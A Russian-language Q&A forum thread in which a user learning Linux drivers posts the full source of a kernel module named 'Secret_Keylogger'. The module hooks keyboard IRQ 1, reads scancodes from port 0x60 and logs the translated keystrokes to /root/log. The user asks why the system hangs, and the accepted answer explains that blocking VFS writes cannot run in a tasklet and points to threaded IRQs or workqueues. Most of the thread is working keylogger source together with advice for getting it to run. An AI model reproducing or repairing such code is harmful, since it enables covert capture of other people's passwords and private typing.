@egorggegor

Почему зависает система после установки драйвера?

Всем привет, изучаю драйверы, следующий код реализует драйвер логирования ввода с клавиатуры, то есть после нажатия на клавишу клавиатуры происходит прерывание, которое записывает скан код клавиши в отдельный файл.
После загрузки драйвера в ядро, система продолжает работать непродолжительное время, после чего зависает.
Возможно здесь есть люди, которые сталкивались с подобной проблемой.
Единственное что мне приходит в голову, это то, что обработка прерывания в тасклете происходит настолько долго, что компьютер зависает.

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/interrupt.h>
#include <asm/io.h>
#include <linux/fs.h>
#include <asm/segment.h>
#include <linux/uaccess.h>
#include <linux/buffer_head.h>
#include <linux/string.h>

#define KB_IRQ 1

const char *NAME = "---Secret_Keylogger---";
const char *LOG_FILE = "/root/log";
struct file* log_fp;
loff_t log_offset;
struct task_struct *logger;

/* Содержит информацию для логирования */
struct logger_data{
    unsigned char scancode;
} ld;

/* =================================================================== */

/* Открывает файл из пространства ядра. */
struct file* log_open(const char *path, int flags, int rights)
{
    struct file *fp = NULL;

    mm_segment_t old_fs;
    int error = 0;

    /* Сохранить текущий предел адреса процесса */
    old_fs = get_fs();
    /* Установка ограничения текущего адреса процесса на адрес ядра */
    set_fs(get_ds());
    fp = filp_open(path, flags, rights);
    /* Восстановление огрнаичения адреса для текущего процесса */
    set_fs(old_fs);

    if(IS_ERR(fp)){
        /* Обработка ошибки */
        error = PTR_ERR(fp);
        printk("log_open(): ERROR = %d", error);
        return NULL;
    }

    return fp;
}

/* Closes file handle. */
void log_close(struct file *fp)
{
    filp_close(fp, NULL);
}

/* Запись буффера в файл из пространства ядра */
int log_write(struct file *fp, unsigned char *data,
        unsigned int size)
{
    mm_segment_t old_fs;
    int ret;

    old_fs = get_fs();
    set_fs(get_ds());

    ret = vfs_write(fp, data, size, &log_offset);
    /* Увеличение смещения файла, чтобы записать следующую операция записи */
    log_offset += size;

    set_fs(old_fs);
    return ret;
}

/* =================================================================== */

/* Преобразует код сканирования в ключ и записывает  */
void tasklet_logger(unsigned long data)
{
    static int shift = 0;
    
    char buf[32];
    memset(buf, 0, sizeof(buf));
    /* Convert scancode to readable key and log it. */
    switch(ld.scancode){
        default:
            return;

        case 1:
            strcpy(buf, "(ESC)"); break;

        case 2:
            strcpy(buf, (shift) ? "!" : "1"); break;

        case 3:
            strcpy(buf, (shift) ? "@" : "2"); break;

        case 4:
            strcpy(buf, (shift) ? "#" : "3"); break;
        
        case 5:
            strcpy(buf, (shift) ? "$" : "4"); break;

        case 6:
            strcpy(buf, (shift) ? "%" : "5"); break;

        case 7:
            strcpy(buf, (shift) ? "^" : "6"); break;

        case 8:
            strcpy(buf, (shift) ? "&" : "7"); break;

        case 9:
            strcpy(buf, (shift) ? "*" : "8"); break;

        case 10:
            strcpy(buf, (shift) ? "(" : "9"); break;

        case 11:
            strcpy(buf, (shift) ? ")" : "0"); break;

        case 12:
            strcpy(buf, (shift) ? "_" : "-"); break;

        case 13:
            strcpy(buf, (shift) ? "+" : "="); break;

        case 14:
            strcpy(buf, "(BACK)"); break;

        case 15:
            strcpy(buf, "(TAB)"); break;

        case 16:
            strcpy(buf, (shift) ? "Q" : "q"); break;

        case 17:
            strcpy(buf, (shift) ? "W" : "w"); break;

        case 18:
            strcpy(buf, (shift) ? "E" : "e"); break;

        case 19:
            strcpy(buf, (shift) ? "R" : "r"); break;

        case 20:
            strcpy(buf, (shift) ? "T" : "t"); break;

        case 21:
            strcpy(buf, (shift) ? "Y" : "y"); break;

        case 22:
            strcpy(buf, (shift) ? "U" : "u"); break;

        case 23:
            strcpy(buf, (shift) ? "I" : "i"); break;

        case 24:
            strcpy(buf, (shift) ? "O" : "o"); break;

        case 25:
            strcpy(buf, (shift) ? "P" : "p"); break;

        case 26:
            strcpy(buf, (shift) ? "{" : "["); break;

        case 27:
            strcpy(buf, (shift) ? "}" : "]"); break;

        case 28:
            strcpy(buf, "(ENTER)"); break;

        case 29:
            strcpy(buf, "(CTRL)"); break;

        case 30:
            strcpy(buf, (shift) ? "A" : "a"); break;

        case 31:
            strcpy(buf, (shift) ? "S" : "s"); break;

        case 32:
            strcpy(buf, (shift) ? "D" : "d"); break;

        case 33:
            strcpy(buf, (shift) ? "F" : "f"); break;
    
        case 34:
            strcpy(buf, (shift) ? "G" : "g"); break;

        case 35:
            strcpy(buf, (shift) ? "H" : "h"); break;

        case 36:
            strcpy(buf, (shift) ? "J" : "j"); break;

        case 37:
            strcpy(buf, (shift) ? "K" : "k"); break;

        case 38:
            strcpy(buf, (shift) ? "L" : "l"); break;
    
        case 39:
            strcpy(buf, (shift) ? ":" : ";"); break;

        case 40:
            strcpy(buf, (shift) ? "\"" : "'"); break;

        case 41:
            strcpy(buf, (shift) ? "~" : "`"); break;

        case 42:
        case 54:
            shift = 1; break;

        case 170:
        case 182:
            shift = 0; break;

        case 44:
            strcpy(buf, (shift) ? "Z" : "z"); break;
        
        case 45:
            strcpy(buf, (shift) ? "X" : "x"); break;

        case 46:
            strcpy(buf, (shift) ? "C" : "c"); break;

        case 47:
            strcpy(buf, (shift) ? "V" : "v"); break;
        
        case 48:
            strcpy(buf, (shift) ? "B" : "b"); break;

        case 49:
            strcpy(buf, (shift) ? "N" : "n"); break;

        case 50:
            strcpy(buf, (shift) ? "M" : "m"); break;

        case 51:
            strcpy(buf, (shift) ? "<" : ","); break;

        case 52:
            strcpy(buf, (shift) ? ">" : "."); break;
    
        case 53:
            strcpy(buf, (shift) ? "?" : "/"); break;

        case 56:
            strcpy(buf, "(R-ALT"); break;
    
        /* Space */
        case 55:
        case 57:
        case 58:
        case 59:
        case 60:
        case 61:
        case 62:
        case 63:
        case 64:
        case 65:
        case 66:
        case 67:
        case 68:
        case 70:
        case 71:
        case 72:
            strcpy(buf, " "); break;

        case 83:
            strcpy(buf, "(DEL)"); break;
    }
    log_write(log_fp, buf, sizeof(buf));
}

/* Регистрация такслета для логирования ключей */
DECLARE_TASKLET(my_tasklet, tasklet_logger, 0);

/* Функция-обработчик для прерывания. */
irq_handler_t kb_irq_handler(int irq, void *dev_id, struct pt_regs *regs)
{
    /* Уставновка глобального значения для получения кода скинрования */
    ld.scancode = inb(0x60);

    /* Мы хотим избежать ввода/вывода в обработчик прерывания планируем
       такслет для записи ключа в файл логирования на свободное время
     */
    tasklet_schedule(&my_tasklet);
    
    return (irq_handler_t)IRQ_HANDLED;
}

/* Точка входа модуля */
static int __init kb_init(void)
{
    int ret;
    char buf[32];

    /* Открытие файла для записи или его создание, если он не существует*/
    log_fp = log_open(LOG_FILE, O_WRONLY | O_CREAT, 0644);
    if(IS_ERR(log_fp)){
        printk(KERN_INFO "FAILED to open log file.\n");
        return 1;
    }
    else{
        /* Файл логирования открыт, напечатать отсладочное сообщение */
        printk(KERN_INFO "SUCCESSFULLY opened log file.\n");

        /* Запись заголовка в лог-файл */
        memset(buf, 0, sizeof(buf));
        strcpy(buf, "-LOG START-\n\n");
        log_write(log_fp, buf, sizeof(buf));
    }

    /* Запрос регистрации общего обработчика прерываний */
    ret = request_irq(KB_IRQ, (irq_handler_t)kb_irq_handler, IRQF_SHARED,
            NAME, &ld);
    if(ret != 0){
        printk(KERN_INFO "FAILED to request IRQ for keyboard.\n");
    }

    return ret;
}

/* Выход из модуля */
static void __exit kb_exit(void)
{
    /* Удлаяем тасклет */
    tasklet_kill(&my_tasklet);

    /* Освобождение обработчика прерываний, отдавая системе первоначальный контроль */
    free_irq(KB_IRQ, &ld);

    /* Закрытие дескриптора файла логирования */
    if(log_fp != NULL){
        log_close(log_fp);
    }
}

MODULE_LICENSE("GPL");
module_init(kb_init);
module_exit(kb_exit);
  • Вопрос задан
  • 125 просмотров
Решения вопроса 1
jcmvbkbc
@jcmvbkbc
"I'm here to consult you" © Dogbert
Чувак, нельзя из тасклета вызывать vfs. Потому что тасклет -- это атомарный контекст, а вызов vfs 100% блокирующий.
Используй threaded IRQ handler (request_threaded_irq) или workqueue и вызывай VFS из контекста ядерного потока.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы